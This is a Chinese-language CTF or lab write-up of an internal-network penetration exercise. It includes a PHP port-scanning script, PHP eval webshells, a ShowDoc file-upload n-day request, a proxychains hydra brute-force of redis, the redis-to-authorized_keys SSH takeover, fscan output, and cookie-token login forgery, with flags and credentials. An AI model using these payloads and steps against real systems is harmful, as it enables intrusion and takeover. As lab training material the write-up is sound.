利用php对web服务进行探测(这里应该可以利用入口的ssrf,但是我没试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
function checkWebService($ip, $port = 80, $timeout = 1) {
    $connection = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($connection) {
        fclose($connection);
        return true; // 服务开放
    }
    return false; // 服务未开放
}

$network = "10.10.0."; // IP 网段
$outputFile = "web_service_results.txt"; // 输出文件
$openWebServices = []; // 用于存储开放 Web 服务的 IP

// 打开文件以写入结果
$fileHandle = fopen($outputFile, "w");
if (!$fileHandle) {
    die("无法打开文件:$outputFile\n");
}

// 遍历 IP 地址范围
for ($i = 1; $i <= 254; $i++) { // 遍历 10.10.0.1 到 10.10.0.254
    $ip = $network . $i;
    if (checkWebService($ip, 80)) {
        $result = "HTTP 服务在 $ip:80 开放\n";
        fwrite($fileHandle, $result);
        $openWebServices[] = "$ip:80";
        echo $result;
    }
    if (checkWebService($ip, 443)) {
        $result = "HTTPS 服务在 $ip:443 开放\n";
        fwrite($fileHandle, $result);
        $openWebServices[] = "$ip:443";
        echo $result;
    }
}

// 关闭文件
fclose($fileHandle);

echo "检测完成,结果已保存到 $outputFile\n";
?>

靶场/image-20241220210617403

是一个CMS

http://10.10.0.22/admin.php存在后台登录

靶场/image-20241220203736716

利用admin/admin登录,在管理中成功上传后门

靶场/image-20241220203825682

靶场/image-20241220204910632

web目录

flag5 flag{c1f0c6b31d9e7816da94740b68139e5c}

根目录

flag6 flag{feeac322e1fe6a6fdf5bd3a1a5ee78fe}

渗透测试四

flag1

入口是一个登录,爆破之后无果。但是对http请求进行修改,发现了神奇的东西

靶场/image-20241221153330770

这里的action会作为函数名被调用,利用这个点完成rce。

靶场/image-20241221153425049

flag1 flag{4851c94c8429295113a13573ca2ef525}

flag2

写一个木马

1
echo -n "<?php eval(\$_POST[a]);phpinfo();?>" > qq.php

查看hosts

靶场/image-20241221154105613

拿到本机ip,然后扫内网,发现没有ping权限,使用np参数

靶场/image-20241221154318136

找到2个内网,一个web服务,和一个ssh,还有一个单独的redis。(但是这个ssh好像有点问题,具体没管,有点事

但是254这个也是这个运维登录系统,估计254和100是同一台主机

那我们先打redis

1
proxychains hydra -P passwd-top22000.txt -e ns -f -V redis://192.168.0.202

爆破得到弱口令123456

靶场/image-20241221160139559

然后就是写公钥了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ssh-keygen –t rsa # 默认情况下,生成后在用户的家目录下的 .ssh 目录下 执行生成key命令


(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  #将公钥写入txt

cat /root/.ssh/1.txt |proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456 -x set crack

proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456

config set dir /root/.ssh      #设置存储公钥路径

config set dbfilename authorized_keys  #设置文件名称

get crack #查看缓存

save #保存缓存到目标主机路径及文件下

exit  #退出

靶场/image-20241221160724486

这样之后就可以ssh连接了。

全端口扫描拿到22000端口(这步不太懂,用什么探测的呢

然后proxychains ssh -i id_rsa -p 22000 root@192.168.0.202

发现flag,并且Note.md里面有密码:Dev@Bug_C00l123

flag2 flag{e25a33e49410c55fb49d27ed2d336d45}

靶场/image-20241221160857446

靶场/image-20241221160845155

flag3

扫描拿到192.168.0.100存在22000端口,使用刚刚的密码成功登录

靶场/image-20241221162112040

flag3 flag{ed305e160a430a212b0b5aeceac0cc07}

flag4

查看hosts发现内网

172.16.0.233

靶场/image-20241221160952257

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@f62750ccae86:~# ./fscan -h 172.16.0.233/24        

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.16.0.233    is alive
(icmp) Target 172.16.0.1      is alive
(icmp) Target 172.16.0.153    is alive
[*] Icmp alive hosts len is: 3
172.16.0.233:6379 open
172.16.0.153:80 open
172.16.0.1:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://172.16.0.153       code:302 len:0      title:None 跳转url: http://172.16.0.153/web/#/
[*] WebTitle http://172.16.0.153/web/#/ code:200 len:1739   title:ShowDoc

发现内网还存在一个web服务,挂上二层代理

利用showdoc的nday

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 10.9.47.6:14881
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 267

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-靶场/image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo 'hello!!!';@eval($_POST[999])?>
----------------------------921378126371623762173617--

成功

靶场/image-20241221163624102

靶场/image-20241221163614588

利用蚁剑连接

靶场/image-20241221163935850

flag4 flag{dd3fc7689c269e93790c276407011f56}

flag5

那sqlite目录里面的showdoc.db.php下载下来,然后使用navicat打开

在user表里面找到账号密码

靶场/image-20241221164404852

devteam/f2ef774f5af471562035a1847f307afc

但是hash没解出来,可以利用token登录

靶场/image-20241221164632517

cookie_token=9fc900c519fee817ae931572950ddefb397256c7f4ab83a1381cad5a801a17fc

把这个加入到cookie里面就可以伪造一个登录的状态了。

靶场/image-20241221165245283

成功查看文章

靶场/image-20241221165258372

root:Test@1234. 也就是说密码是Test@1234. 那么这个密码是谁的呢,扫描172.16.0.153的全端口

靶场/image-20241221165606703

这个22000就是我们接下来要利用的ssh端口了。

靶场/image-20241221165445940

flag5 flag{1b825117a12ccc771f13f372361d695e}

CTF Writeup web